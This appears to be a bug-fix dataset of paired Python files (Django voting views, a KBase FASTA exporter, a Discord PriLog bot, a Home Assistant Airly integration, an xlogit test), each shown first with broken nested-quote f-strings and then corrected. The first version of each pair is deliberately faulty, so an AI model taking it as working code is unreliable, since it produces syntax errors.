# Delete upvote vote!
ro_ud_table_obj.delete()
# Update votes
ro_table_obj.upvotes -= 1
ro_table_obj.save()
return success({
'score': ro_table_obj.upvotes-ro_table_obj.downvotes,
'voted': {'up': False, 'down': False},
})
elif (not ro_ud_table_obj.upvote) and upvote:
# Delete downvote vote
ro_ud_table_obj.delete()
ro_table_obj.downvotes -= 1
ro_table_obj.save()
return success({
'score': ro_table_obj.upvotes-ro_table_obj.downvotes,
'voted': {'up': False, 'down': False},
})
#This user has not upvoted or downvoted before this RO
#Create a new vote database object
new_vote_obj = ro_ud_table(**{
'obc_user': obc_user,
ro: ro_table_obj,
'upvote': upvote,
})
new_vote_obj.save()
# Change the upvote / downvote counter of this research object
if upvote:
ro_table_obj.upvotes += 1
else:
ro_table_obj.downvotes += 1
ro_table_obj.save()
ret = {
'score': ro_table_obj.upvotes-ro_table_obj.downvotes,
'voted': {'up': upvote, 'down': not upvote},
}
return success(ret)
@has_data
def markdown_preview(request, **kwargs):
text = kwargs.get('text', '')
if not type(text) is str:
return fail('Error 2871')
ret = {
'html': markdown(text),
}
return success(ret)
@has_data
def edit_comment(request, **kwargs):
'''
url: edit_comment/
'''
if request.user.is_anonymous:
return fail('Please login to upvote/downvote comments')
if not user_is_validated(request):
return fail('Please validate your email to edit the comment.' + validate_toast_button());
comment_id = int(kwargs['comment_id'])
new_html = kwargs['new_html']
is_root = kwargs['is_root']
comment_type = kwargs.get('comment_type')
# Get the comment
comment = Comment.objects.get(pk=comment_id)
# Get the user
obc_user = OBC_user.objects.get(user=request.user)
if comment.obc_user.id != obc_user.id:
return fail("You don't have the permission to edit this comment!")
if not is_root:
comment.comment = markdown(new_html)
comment.comment_html = new_html
if comment_type in ['solution', 'note', 'agree', 'disagree']:
comment.opinion = comment_type
else:
comment.title = new_html
comment.save()
ret = {
'message': 'The comment has been updated!'
}
return success(ret)
### END OF Q&A
### VIEWS END ###### |
import os
import shutil
from Bio import SeqIO
from Bio.Seq import Seq
from Bio.SeqRecord import SeqRecord
from Bio.Alphabet import SingleLetterAlphabet
from installed_clients.DataFileUtilClient import DataFileUtil
class AssemblyToFasta:
def __init__(self, callback_url, scratch):
self.scratch = scratch
self.dfu = DataFileUtil(callback_url)
def export_as_fasta(self, ctx, params):
""" Used almost exclusively for download only """
# validate parameters
if 'input_ref' not in params:
raise ValueError('Cannot export Assembly- not input_ref field defined.')
# export to a file
file = self.assembly_as_fasta(ctx, {'ref': params['input_ref']})
# create the output directory and move the file there
export_package_dir = os.path.join(self.scratch, file['assembly_name'])
os.makedirs(export_package_dir)
shutil.move(file['path'], os.path.join(export_package_dir, os.path.basename(file['path'])))
# package it up and be done
package_details = self.dfu.package_for_download({'file_path': export_package_dir,
'ws_refs': [params['input_ref']]
})
return {'shock_id': package_details['shock_id']}
def assembly_as_fasta(self, ctx, params):
""" main function that accepts a ref to an object and writes a file """
self.validate_params(params)
print(f'downloading ws object data ({ params['ref']})')
assembly_object = self.dfu.get_objects({'object_refs': [params['ref']]})['data'][0]
ws_type = assembly_object['info'][2]
obj_name = assembly_object['info'][1]
if 'filename' in params:
output_filename = params['filename']
else:
output_filename = obj_name + '.fa'
output_fasta_file_path = os.path.join(self.scratch, output_filename)
if 'KBaseGenomes.ContigSet' in ws_type:
self.process_legacy_contigset(output_fasta_file_path,
assembly_object['data'])
elif 'KBaseGenomeAnnotations.Assembly' in ws_type:
self.process_assembly(output_fasta_file_path, assembly_object['data'])
else:
raise ValueError('Cannot write data to fasta; invalid WS type (' + ws_type +
'). Supported types are KBaseGenomes.ContigSet and ' +
'KBaseGenomeAnnotations.Assembly')
return {'path': output_fasta_file_path, 'assembly_name': obj_name}
def fasta_rows_generator_from_contigset(self, contig_list):
""" generates SeqRecords iterator for writing from a legacy contigset object """
for contig in contig_list:
description = ''
if 'description' in contig and contig['description']:
description = contig['description']
yield SeqRecord(Seq(contig['sequence'], SingleLetterAlphabet),
id=contig['id'],
description=description)
def process_legacy_contigset(self, output_fasta_path, data):
SeqIO.write(self.fasta_rows_generator_from_contigset(data['contigs']),
output_fasta_path,
"fasta")
def process_assembly(self, output_fasta_path, data):
self.dfu.shock_to_file({'handle_id': data['fasta_handle_ref'],
'file_path': output_fasta_path,
'unpack': 'uncompress'
})
def validate_params(self, params):
for key in ['ref']:
if key not in params:
raise ValueError('required "' + key + '" field was not defined')
| import os
import shutil
from Bio import SeqIO
from Bio.Seq import Seq
from Bio.SeqRecord import SeqRecord
from Bio.Alphabet import SingleLetterAlphabet
from installed_clients.DataFileUtilClient import DataFileUtil
class AssemblyToFasta:
def __init__(self, callback_url, scratch):
self.scratch = scratch
self.dfu = DataFileUtil(callback_url)
def export_as_fasta(self, ctx, params):
""" Used almost exclusively for download only """
# validate parameters
if 'input_ref' not in params:
raise ValueError('Cannot export Assembly- not input_ref field defined.')
# export to a file
file = self.assembly_as_fasta(ctx, {'ref': params['input_ref']})
# create the output directory and move the file there
export_package_dir = os.path.join(self.scratch, file['assembly_name'])
os.makedirs(export_package_dir)
shutil.move(file['path'], os.path.join(export_package_dir, os.path.basename(file['path'])))
# package it up and be done
package_details = self.dfu.package_for_download({'file_path': export_package_dir,
'ws_refs': [params['input_ref']]
})
return {'shock_id': package_details['shock_id']}
def assembly_as_fasta(self, ctx, params):
""" main function that accepts a ref to an object and writes a file """
self.validate_params(params)
print(f'downloading ws object data ({ params["ref"]})')
assembly_object = self.dfu.get_objects({'object_refs': [params['ref']]})['data'][0]
ws_type = assembly_object['info'][2]
obj_name = assembly_object['info'][1]
if 'filename' in params:
output_filename = params['filename']
else:
output_filename = obj_name + '.fa'
output_fasta_file_path = os.path.join(self.scratch, output_filename)
if 'KBaseGenomes.ContigSet' in ws_type:
self.process_legacy_contigset(output_fasta_file_path,
assembly_object['data'])
elif 'KBaseGenomeAnnotations.Assembly' in ws_type:
self.process_assembly(output_fasta_file_path, assembly_object['data'])
else:
raise ValueError('Cannot write data to fasta; invalid WS type (' + ws_type +
'). Supported types are KBaseGenomes.ContigSet and ' +
'KBaseGenomeAnnotations.Assembly')
return {'path': output_fasta_file_path, 'assembly_name': obj_name}
def fasta_rows_generator_from_contigset(self, contig_list):
""" generates SeqRecords iterator for writing from a legacy contigset object """
for contig in contig_list:
description = ''
if 'description' in contig and contig['description']:
description = contig['description']
yield SeqRecord(Seq(contig['sequence'], SingleLetterAlphabet),
id=contig['id'],
description=description)
def process_legacy_contigset(self, output_fasta_path, data):
SeqIO.write(self.fasta_rows_generator_from_contigset(data['contigs']),
output_fasta_path,
"fasta")
def process_assembly(self, output_fasta_path, data):
self.dfu.shock_to_file({'handle_id': data['fasta_handle_ref'],
'file_path': output_fasta_path,
'unpack': 'uncompress'
})
def validate_params(self, params):
for key in ['ref']:
if key not in params:
raise ValueError('required "' + key + '" field was not defined')
|
import logging
import os
import aiohttp
import discord
from discord.ext import commands
PRILOG_TOKEN = os.environ["PRILOG_TOKEN"]
class PriLog(commands.Cog):
"""Prilog APIを利用します。"""
def __init__(self, bot):
self.bot = bot
self.logger = logging.getLogger('discord.PriLog')
async def get_prilog(self, url):
async with aiohttp.ClientSession() as session:
async with session.get('https://prilog.jp/rest/analyze'
f'?Url={url}&Token={PRILOG_TOKEN}') as r:
return await r.json()
@commands.command()
async def log(self, ctx, url: str):
"""
引数にクランバトル動画を渡すとPriLogを利用できます。
コマンドとURLの間に半角スペースを空けてください。
例: /log https://www.youtube.com/watch?v=mvLSw5vCpGU
"""
resp = await self.get_prilog(url)
self.logger.info(f'Try to get:{url}... status={resp['status']}')
if resp["status"] < 310:
embed = discord.Embed(title=resp["result"]["title"],
description=resp["msg"],
color=0x6eace2)
name = f'総ダメージ: {resp['result']['total_damage']}' if \
resp["result"]["total_damage"] else '総ダメージ: 不明'
embed.add_field(name=name,
value='```'
+ resp["result"]["timeline_txt"]
+ '```')
else:
embed = discord.Embed(title='解析失敗',
description=f'ステータス: {resp['status']}\n'
f'メッセージ: {resp['msg']}',
color=0xed8ab0)
await ctx.send(embed=embed)
@commands.command()
async def logb(self, ctx, url: str):
"""
引数にクランバトル動画を渡すとPriLogを利用できます。
/logbでは敵UB入りのタイムラインを取得します。
例: /logb https://www.youtube.com/watch?v=mvLSw5vCpGU
"""
resp = await self.get_prilog(url)
self.logger.info(f'Try to get:{url}... status={resp['status']}')
if resp["status"] < 310:
embed = discord.Embed(title=resp["result"]["title"],
description=resp["msg"],
color=0x6eace2)
name = f'総ダメージ: {resp['result']['total_damage']}' if \
resp["result"]["total_damage"] else '総ダメージ: 不明'
embed.add_field(name=name,
value='```'
+ resp["result"]["timeline_txt_enemy"]
+ '```')
else:
embed = discord.Embed(title='解析失敗',
description=f'ステータス: {resp['status']}\n'
f'メッセージ: {resp['msg']}',
color=0xed8ab0)
await ctx.send(embed=embed)
def setup(bot):
bot.add_cog(PriLog(bot))
| import logging
import os
import aiohttp
import discord
from discord.ext import commands
PRILOG_TOKEN = os.environ["PRILOG_TOKEN"]
class PriLog(commands.Cog):
"""Prilog APIを利用します。"""
def __init__(self, bot):
self.bot = bot
self.logger = logging.getLogger('discord.PriLog')
async def get_prilog(self, url):
async with aiohttp.ClientSession() as session:
async with session.get('https://prilog.jp/rest/analyze'
f'?Url={url}&Token={PRILOG_TOKEN}') as r:
return await r.json()
@commands.command()
async def log(self, ctx, url: str):
"""
引数にクランバトル動画を渡すとPriLogを利用できます。
コマンドとURLの間に半角スペースを空けてください。
例: /log https://www.youtube.com/watch?v=mvLSw5vCpGU
"""
resp = await self.get_prilog(url)
self.logger.info(f'Try to get:{url}... status={resp["status"]}')
if resp["status"] < 310:
embed = discord.Embed(title=resp["result"]["title"],
description=resp["msg"],
color=0x6eace2)
name = f'総ダメージ: {resp["result"]["total_damage"]}' if \
resp["result"]["total_damage"] else '総ダメージ: 不明'
embed.add_field(name=name,
value='```'
+ resp["result"]["timeline_txt"]
+ '```')
else:
embed = discord.Embed(title='解析失敗',
description=f'ステータス: {resp["status"]}\n'
f'メッセージ: {resp["msg"]}',
color=0xed8ab0)
await ctx.send(embed=embed)
@commands.command()
async def logb(self, ctx, url: str):
"""
引数にクランバトル動画を渡すとPriLogを利用できます。
/logbでは敵UB入りのタイムラインを取得します。
例: /logb https://www.youtube.com/watch?v=mvLSw5vCpGU
"""
resp = await self.get_prilog(url)
self.logger.info(f'Try to get:{url}... status={resp["status"]}')
if resp["status"] < 310:
embed = discord.Embed(title=resp["result"]["title"],
description=resp["msg"],
color=0x6eace2)
name = f'総ダメージ: {resp["result"]["total_damage"]}' if \
resp["result"]["total_damage"] else '総ダメージ: 不明'
embed.add_field(name=name,
value='```'
+ resp["result"]["timeline_txt_enemy"]
+ '```')
else:
embed = discord.Embed(title='解析失敗',
description=f'ステータス: {resp["status"]}\n'
f'メッセージ: {resp["msg"]}',
color=0xed8ab0)
await ctx.send(embed=embed)
def setup(bot):
bot.add_cog(PriLog(bot))
|
"""The Airly integration."""
from __future__ import annotations
from datetime import timedelta
import logging
from math import ceil
from aiohttp import ClientSession
from aiohttp.client_exceptions import ClientConnectorError
from airly import Airly
from airly.exceptions import AirlyError
import async_timeout
from homeassistant.components.air_quality import DOMAIN as AIR_QUALITY_PLATFORM
from homeassistant.config_entries import ConfigEntry
from homeassistant.const import CONF_API_KEY, CONF_LATITUDE, CONF_LONGITUDE
from homeassistant.core import HomeAssistant
from homeassistant.helpers import entity_registry
from homeassistant.helpers.aiohttp_client import async_get_clientsession
from homeassistant.helpers.device_registry import async_get_registry
from homeassistant.helpers.update_coordinator import DataUpdateCoordinator, UpdateFailed
from homeassistant.util import dt as dt_util
from .const import (
ATTR_API_ADVICE,
ATTR_API_CAQI,
ATTR_API_CAQI_DESCRIPTION,
ATTR_API_CAQI_LEVEL,
CONF_USE_NEAREST,
DOMAIN,
MAX_UPDATE_INTERVAL,
MIN_UPDATE_INTERVAL,
NO_AIRLY_SENSORS,
)
PLATFORMS = ["sensor"]
_LOGGER = logging.getLogger(__name__)
def set_update_interval(instances_count: int, requests_remaining: int) -> timedelta:
"""
Return data update interval.
The number of requests is reset at midnight UTC so we calculate the update
interval based on number of minutes until midnight, the number of Airly instances
and the number of remaining requests.
"""
now = dt_util.utcnow()
midnight = dt_util.find_next_time_expression_time(
now, seconds=[0], minutes=[0], hours=[0]
)
minutes_to_midnight = (midnight - now).total_seconds() / 60
interval = timedelta(
minutes=min(
max(
ceil(minutes_to_midnight / requests_remaining * instances_count),
MIN_UPDATE_INTERVAL,
),
MAX_UPDATE_INTERVAL,
)
)
_LOGGER.debug("Data will be update every %s", interval)
return interval
async def async_setup_entry(hass: HomeAssistant, entry: ConfigEntry) -> bool:
"""Set up Airly as config entry."""
api_key = entry.data[CONF_API_KEY]
latitude = entry.data[CONF_LATITUDE]
longitude = entry.data[CONF_LONGITUDE]
use_nearest = entry.data.get(CONF_USE_NEAREST, False)
# For backwards compat, set unique ID
if entry.unique_id is None:
hass.config_entries.async_update_entry(
entry, unique_id=f"{latitude}-{longitude}"
)
# identifiers in device_info should use tuple[str, str] type, but latitude and
# longitude are float, so we convert old device entries to use correct types
# We used to use a str 3-tuple here sometime, convert that to a 2-tuple too.
device_registry = await async_get_registry(hass)
old_ids = (DOMAIN, latitude, longitude)
for old_ids in (
(DOMAIN, latitude, longitude),
(
DOMAIN,
str(latitude),
str(longitude),
),
):
device_entry = device_registry.async_get_device({old_ids}) # type: ignore[arg-type]
if device_entry and entry.entry_id in device_entry.config_entries:
new_ids = (DOMAIN, f"{latitude}-{longitude}")
device_registry.async_update_device(
device_entry.id, new_identifiers={new_ids}
)
websession = async_get_clientsession(hass)
update_interval = timedelta(minutes=MIN_UPDATE_INTERVAL)
coordinator = AirlyDataUpdateCoordinator(
hass, websession, api_key, latitude, longitude, update_interval, use_nearest
)
await coordinator.async_config_entry_first_refresh()
hass.data.setdefault(DOMAIN, {})
hass.data[DOMAIN][entry.entry_id] = coordinator
hass.config_entries.async_setup_platforms(entry, PLATFORMS)
# Remove air_quality entities from registry if they exist
ent_reg = entity_registry.async_get(hass)
unique_id = f"{coordinator.latitude}-{coordinator.longitude}"
if entity_id := ent_reg.async_get_entity_id(
AIR_QUALITY_PLATFORM, DOMAIN, unique_id
):
_LOGGER.debug("Removing deprecated air_quality entity %s", entity_id)
ent_reg.async_remove(entity_id)
return True
async def async_unload_entry(hass: HomeAssistant, entry: ConfigEntry) -> bool:
"""Unload a config entry."""
unload_ok = await hass.config_entries.async_unload_platforms(entry, PLATFORMS)
if unload_ok:
hass.data[DOMAIN].pop(entry.entry_id)
return unload_ok
class AirlyDataUpdateCoordinator(DataUpdateCoordinator):
"""Define an object to hold Airly data."""
def __init__(
self,
hass: HomeAssistant,
session: ClientSession,
api_key: str,
latitude: float,
longitude: float,
update_interval: timedelta,
use_nearest: bool,
) -> None:
"""Initialize."""
self.latitude = latitude
self.longitude = longitude
self.airly = Airly(api_key, session)
self.use_nearest = use_nearest
super().__init__(hass, _LOGGER, name=DOMAIN, update_interval=update_interval)
async def _async_update_data(self) -> dict[str, str | float | int]:
"""Update data via library."""
data: dict[str, str | float | int] = {}
if self.use_nearest:
measurements = self.airly.create_measurements_session_nearest(
self.latitude, self.longitude, max_distance_km=5
)
else:
measurements = self.airly.create_measurements_session_point(
self.latitude, self.longitude
)
with async_timeout.timeout(20):
try:
await measurements.update()
except (AirlyError, ClientConnectorError) as error:
raise UpdateFailed(error) from error
_LOGGER.debug(
"Requests remaining: %s/%s",
self.airly.requests_remaining,
self.airly.requests_per_day,
)
# Airly API sometimes returns None for requests remaining so we update
# update_interval only if we have valid value.
if self.airly.requests_remaining:
self.update_interval = set_update_interval(
len(self.hass.config_entries.async_entries(DOMAIN)),
self.airly.requests_remaining,
)
values = measurements.current["values"]
index = measurements.current["indexes"][0]
standards = measurements.current["standards"]
if index["description"] == NO_AIRLY_SENSORS:
raise UpdateFailed("Can't retrieve data: no Airly sensors in this area")
for value in values:
data[value["name"]] = value["value"]
for standard in standards:
data[f"{standard["pollutant"]}_LIMIT"] = standard["limit"]
data[f"{standard["pollutant"]}_PERCENT"] = standard["percent"]
data[ATTR_API_CAQI] = index["value"]
data[ATTR_API_CAQI_LEVEL] = index["level"].lower().replace("_", " ")
data[ATTR_API_CAQI_DESCRIPTION] = index["description"]
data[ATTR_API_ADVICE] = index["advice"]
return data
| """The Airly integration."""
from __future__ import annotations
from datetime import timedelta
import logging
from math import ceil
from aiohttp import ClientSession
from aiohttp.client_exceptions import ClientConnectorError
from airly import Airly
from airly.exceptions import AirlyError
import async_timeout
from homeassistant.components.air_quality import DOMAIN as AIR_QUALITY_PLATFORM
from homeassistant.config_entries import ConfigEntry
from homeassistant.const import CONF_API_KEY, CONF_LATITUDE, CONF_LONGITUDE
from homeassistant.core import HomeAssistant
from homeassistant.helpers import entity_registry
from homeassistant.helpers.aiohttp_client import async_get_clientsession
from homeassistant.helpers.device_registry import async_get_registry
from homeassistant.helpers.update_coordinator import DataUpdateCoordinator, UpdateFailed
from homeassistant.util import dt as dt_util
from .const import (
ATTR_API_ADVICE,
ATTR_API_CAQI,
ATTR_API_CAQI_DESCRIPTION,
ATTR_API_CAQI_LEVEL,
CONF_USE_NEAREST,
DOMAIN,
MAX_UPDATE_INTERVAL,
MIN_UPDATE_INTERVAL,
NO_AIRLY_SENSORS,
)
PLATFORMS = ["sensor"]
_LOGGER = logging.getLogger(__name__)
def set_update_interval(instances_count: int, requests_remaining: int) -> timedelta:
"""
Return data update interval.
The number of requests is reset at midnight UTC so we calculate the update
interval based on number of minutes until midnight, the number of Airly instances
and the number of remaining requests.
"""
now = dt_util.utcnow()
midnight = dt_util.find_next_time_expression_time(
now, seconds=[0], minutes=[0], hours=[0]
)
minutes_to_midnight = (midnight - now).total_seconds() / 60
interval = timedelta(
minutes=min(
max(
ceil(minutes_to_midnight / requests_remaining * instances_count),
MIN_UPDATE_INTERVAL,
),
MAX_UPDATE_INTERVAL,
)
)
_LOGGER.debug("Data will be update every %s", interval)
return interval
async def async_setup_entry(hass: HomeAssistant, entry: ConfigEntry) -> bool:
"""Set up Airly as config entry."""
api_key = entry.data[CONF_API_KEY]
latitude = entry.data[CONF_LATITUDE]
longitude = entry.data[CONF_LONGITUDE]
use_nearest = entry.data.get(CONF_USE_NEAREST, False)
# For backwards compat, set unique ID
if entry.unique_id is None:
hass.config_entries.async_update_entry(
entry, unique_id=f"{latitude}-{longitude}"
)
# identifiers in device_info should use tuple[str, str] type, but latitude and
# longitude are float, so we convert old device entries to use correct types
# We used to use a str 3-tuple here sometime, convert that to a 2-tuple too.
device_registry = await async_get_registry(hass)
old_ids = (DOMAIN, latitude, longitude)
for old_ids in (
(DOMAIN, latitude, longitude),
(
DOMAIN,
str(latitude),
str(longitude),
),
):
device_entry = device_registry.async_get_device({old_ids}) # type: ignore[arg-type]
if device_entry and entry.entry_id in device_entry.config_entries:
new_ids = (DOMAIN, f"{latitude}-{longitude}")
device_registry.async_update_device(
device_entry.id, new_identifiers={new_ids}
)
websession = async_get_clientsession(hass)
update_interval = timedelta(minutes=MIN_UPDATE_INTERVAL)
coordinator = AirlyDataUpdateCoordinator(
hass, websession, api_key, latitude, longitude, update_interval, use_nearest
)
await coordinator.async_config_entry_first_refresh()
hass.data.setdefault(DOMAIN, {})
hass.data[DOMAIN][entry.entry_id] = coordinator
hass.config_entries.async_setup_platforms(entry, PLATFORMS)
# Remove air_quality entities from registry if they exist
ent_reg = entity_registry.async_get(hass)
unique_id = f"{coordinator.latitude}-{coordinator.longitude}"
if entity_id := ent_reg.async_get_entity_id(
AIR_QUALITY_PLATFORM, DOMAIN, unique_id
):
_LOGGER.debug("Removing deprecated air_quality entity %s", entity_id)
ent_reg.async_remove(entity_id)
return True
async def async_unload_entry(hass: HomeAssistant, entry: ConfigEntry) -> bool:
"""Unload a config entry."""
unload_ok = await hass.config_entries.async_unload_platforms(entry, PLATFORMS)
if unload_ok:
hass.data[DOMAIN].pop(entry.entry_id)
return unload_ok
class AirlyDataUpdateCoordinator(DataUpdateCoordinator):
"""Define an object to hold Airly data."""
def __init__(
self,
hass: HomeAssistant,
session: ClientSession,
api_key: str,
latitude: float,
longitude: float,
update_interval: timedelta,
use_nearest: bool,
) -> None:
"""Initialize."""
self.latitude = latitude
self.longitude = longitude
self.airly = Airly(api_key, session)
self.use_nearest = use_nearest
super().__init__(hass, _LOGGER, name=DOMAIN, update_interval=update_interval)
async def _async_update_data(self) -> dict[str, str | float | int]:
"""Update data via library."""
data: dict[str, str | float | int] = {}
if self.use_nearest:
measurements = self.airly.create_measurements_session_nearest(
self.latitude, self.longitude, max_distance_km=5
)
else:
measurements = self.airly.create_measurements_session_point(
self.latitude, self.longitude
)
with async_timeout.timeout(20):
try:
await measurements.update()
except (AirlyError, ClientConnectorError) as error:
raise UpdateFailed(error) from error
_LOGGER.debug(
"Requests remaining: %s/%s",
self.airly.requests_remaining,
self.airly.requests_per_day,
)
# Airly API sometimes returns None for requests remaining so we update
# update_interval only if we have valid value.
if self.airly.requests_remaining:
self.update_interval = set_update_interval(
len(self.hass.config_entries.async_entries(DOMAIN)),
self.airly.requests_remaining,
)
values = measurements.current["values"]
index = measurements.current["indexes"][0]
standards = measurements.current["standards"]
if index["description"] == NO_AIRLY_SENSORS:
raise UpdateFailed("Can't retrieve data: no Airly sensors in this area")
for value in values:
data[value["name"]] = value["value"]
for standard in standards:
data[f"{standard['pollutant']}_LIMIT"] = standard["limit"]
data[f"{standard['pollutant']}_PERCENT"] = standard["percent"]
data[ATTR_API_CAQI] = index["value"]
data[ATTR_API_CAQI_LEVEL] = index["level"].lower().replace("_", " ")
data[ATTR_API_CAQI_DESCRIPTION] = index["description"]
data[ATTR_API_ADVICE] = index["advice"]
return data
|
import numpy as np
import pandas as pd
import sys
sys.path.append(".") # Path of xlogit library root folder.
from xlogit import MixedLogit, MultinomialLogit
print("""
**EXPECTED:
MultinomialLogit
convergence=True LL=-4958.6491193376105 electricity
convergence=True LL=-1311.9796171079972 fishing
pred pier base: 0.09 updated: 0.107
MixedLogit
convergence=True LL=-3891.7177135708052 electricity
convergence=True LL=-2278.8977801007272 artificial
convergence=True LL=-1300.5113418149986 fishing
convergence=True LL=-1300.5113418149986 fishing batch
pred pier base: 0.089 updated: 0.105
pred pier base: 0.089 updated: 0.105 batch""")
print("")
print("**OBTAINED:")
print("MultinomialLogit")
# Electricity dataset
df = pd.read_csv("examples/data/electricity_long.csv")
varnames = ['pf', 'cl', 'loc', 'wk', 'tod', 'seas']
model = MultinomialLogit()
model.fit(X=df[varnames], y=df['choice'], varnames=varnames, ids=df['chid'],
alts=df['alt'], verbose=0)
print(f"convergence={model.convergence} LL={model.loglikelihood} electricity")
# Fishing dataset
df = pd.read_csv("examples/data/fishing_long.csv")
varnames = ['price', 'catch']
model = MultinomialLogit()
model.fit(X=df[varnames], y=df['choice'], varnames=varnames, alts=df['alt'],
ids=df['id'], verbose=0)
print(f"convergence={model.convergence} LL={model.loglikelihood} fishing")
# Predict
_, freq = model.predict(X=df[varnames], varnames=varnames, ids=df['id'],
alts=df['alt'], return_freq=True, verbose=0)
df.loc[df['alt']=='boat', 'price'] *= 1.2 # 20 percent price increase
_, freq_2 = model.predict(X=df[varnames], varnames=varnames, ids=df['id'],
alts=df['alt'], return_freq=True, verbose=0)
print(f"pred pier base: {freq["pier"]} updated: {freq_2["pier"]}")
print("MixedLogit")
# Electricity dataset
df = pd.read_csv("examples/data/electricity_long.csv")
varnames = ['pf', 'cl', 'loc', 'wk', 'tod', 'seas']
model = MixedLogit()
model.fit(X=df[varnames],
y=df['choice'],
varnames=varnames,
ids=df['chid'],
panels=df['id'],
alts=df['alt'],
n_draws=500,
verbose=0,
randvars={'pf': 'n', 'cl': 'n', 'loc': 'n',
'wk': 'n', 'tod': 'n', 'seas': 'n'})
print(f"convergence={model.convergence} LL={model.loglikelihood} electricity")
# Artificial dataset
df = pd.read_csv("examples/data/artificial_long.csv")
varnames = ['price', 'time', 'conven', 'comfort', 'meals', 'petfr',
'emipp', 'nonsig1', 'nonsig2', 'nonsig3']
model = MixedLogit()
model.fit(X=df[varnames],
y=df['choice'],
varnames=varnames,
alts=df['alt'],
ids=df['id'],
n_draws=500,
panels=None,
verbose=0,
randvars={'meals': 'n', 'petfr': 'n', 'emipp': 'n'}
)
print(f"convergence={model.convergence} LL={model.loglikelihood} artificial")
# Fishing dataset regular and batch
df = pd.read_csv("examples/data/fishing_long.csv")
varnames = ['price', 'catch']
model = MixedLogit()
model.fit(X=df[varnames], y=df['choice'], varnames=varnames, alts=df['alt'],
ids=df['id'], n_draws=1000, randvars={'price': 'n', 'catch': 'n'}, verbose=0)
print(f"convergence={model.convergence} LL={model.loglikelihood} fishing")
varnames = ['price', 'catch']
model = MixedLogit()
model.fit(X=df[varnames], y=df['choice'], varnames=varnames, alts=df['alt'],
ids=df['id'], n_draws=1000, randvars={'price': 'n', 'catch': 'n'}, verbose=0, batch_size=200)
print(f"convergence={model.convergence} LL={model.loglikelihood} fishing batch")
# Predict regular and batch
choices, freq = model.predict(X=df[varnames], varnames=varnames, ids=df['id'],
alts=df['alt'], return_freq=True, n_draws=1000, verbose=0)
df.loc[df['alt']=='boat', 'price'] *= 1.2 # 20 percent price increase
choices, freq_2 = model.predict(X=df[varnames], varnames=varnames, ids=df['id'],
alts=df['alt'], return_freq=True, n_draws=1000, verbose=0)
print(f"pred pier base: {freq["pier"]} updated: {freq_2["pier"]}")
df = pd.read_csv("examples/data/fishing_long.csv")
choices, freq = model.predict(X=df[varnames], varnames=varnames, ids=df['id'],
alts=df['alt'], return_freq=True, n_draws=1000, verbose=0, batch_size=200)
df.loc[df['alt']=='boat', 'price'] *= 1.2 # 20 percent price increase
choices, freq_2 = model.predict(X=df[varnames], varnames=varnames, ids=df['id'],
alts=df['alt'], return_freq=True, n_draws=1000, verbose=0, batch_size=200)
print(f"pred pier base: {freq["pier"]} updated: {freq_2["pier"]} batch") | import numpy as np
import pandas as pd
import sys
sys.path.append(".") # Path of xlogit library root folder.
from xlogit import MixedLogit, MultinomialLogit
print("""
**EXPECTED:
MultinomialLogit
convergence=True LL=-4958.6491193376105 electricity
convergence=True LL=-1311.9796171079972 fishing
pred pier base: 0.09 updated: 0.107
MixedLogit
convergence=True LL=-3891.7177135708052 electricity
convergence=True LL=-2278.8977801007272 artificial
convergence=True LL=-1300.5113418149986 fishing
convergence=True LL=-1300.5113418149986 fishing batch
pred pier base: 0.089 updated: 0.105
pred pier base: 0.089 updated: 0.105 batch""")
print("")
print("**OBTAINED:")
print("MultinomialLogit")
# Electricity dataset
df = pd.read_csv("examples/data/electricity_long.csv")
varnames = ['pf', 'cl', 'loc', 'wk', 'tod', 'seas']
model = MultinomialLogit()
model.fit(X=df[varnames], y=df['choice'], varnames=varnames, ids=df['chid'],
alts=df['alt'], verbose=0)
print(f"convergence={model.convergence} LL={model.loglikelihood} electricity")
# Fishing dataset
df = pd.read_csv("examples/data/fishing_long.csv")
varnames = ['price', 'catch']
model = MultinomialLogit()
model.fit(X=df[varnames], y=df['choice'], varnames=varnames, alts=df['alt'],
ids=df['id'], verbose=0)
print(f"convergence={model.convergence} LL={model.loglikelihood} fishing")
# Predict
_, freq = model.predict(X=df[varnames], varnames=varnames, ids=df['id'],
alts=df['alt'], return_freq=True, verbose=0)
df.loc[df['alt']=='boat', 'price'] *= 1.2 # 20 percent price increase
_, freq_2 = model.predict(X=df[varnames], varnames=varnames, ids=df['id'],
alts=df['alt'], return_freq=True, verbose=0)
print(f"pred pier base: {freq['pier']} updated: {freq_2['pier']}")
print("MixedLogit")
# Electricity dataset
df = pd.read_csv("examples/data/electricity_long.csv")
varnames = ['pf', 'cl', 'loc', 'wk', 'tod', 'seas']
model = MixedLogit()
model.fit(X=df[varnames],
y=df['choice'],
varnames=varnames,
ids=df['chid'],
panels=df['id'],
alts=df['alt'],
n_draws=500,
verbose=0,
randvars={'pf': 'n', 'cl': 'n', 'loc': 'n',
'wk': 'n', 'tod': 'n', 'seas': 'n'})
print(f"convergence={model.convergence} LL={model.loglikelihood} electricity")
# Artificial dataset
df = pd.read_csv("examples/data/artificial_long.csv")
varnames = ['price', 'time', 'conven', 'comfort', 'meals', 'petfr',
'emipp', 'nonsig1', 'nonsig2', 'nonsig3']
model = MixedLogit()
model.fit(X=df[varnames],
y=df['choice'],
varnames=varnames,
alts=df['alt'],
ids=df['id'],
n_draws=500,
panels=None,
verbose=0,
randvars={'meals': 'n', 'petfr': 'n', 'emipp': 'n'}
)
print(f"convergence={model.convergence} LL={model.loglikelihood} artificial")
# Fishing dataset regular and batch
df = pd.read_csv("examples/data/fishing_long.csv")
varnames = ['price', 'catch']
model = MixedLogit()
model.fit(X=df[varnames], y=df['choice'], varnames=varnames, alts=df['alt'],
ids=df['id'], n_draws=1000, randvars={'price': 'n', 'catch': 'n'}, verbose=0)
print(f"convergence={model.convergence} LL={model.loglikelihood} fishing")
varnames = ['price', 'catch']
model = MixedLogit()
model.fit(X=df[varnames], y=df['choice'], varnames=varnames, alts=df['alt'],
ids=df['id'], n_draws=1000, randvars={'price': 'n', 'catch': 'n'}, verbose=0, batch_size=200)
print(f"convergence={model.convergence} LL={model.loglikelihood} fishing batch")
# Predict regular and batch
choices, freq = model.predict(X=df[varnames], varnames=varnames, ids=df['id'],
alts=df['alt'], return_freq=True, n_draws=1000, verbose=0)
df.loc[df['alt']=='boat', 'price'] *= 1.2 # 20 percent price increase
choices, freq_2 = model.predict(X=df[varnames], varnames=varnames, ids=df['id'],
alts=df['alt'], return_freq=True, n_draws=1000, verbose=0)
print(f"pred pier base: {freq['pier']} updated: {freq_2['pier']}")
df = pd.read_csv("examples/data/fishing_long.csv")
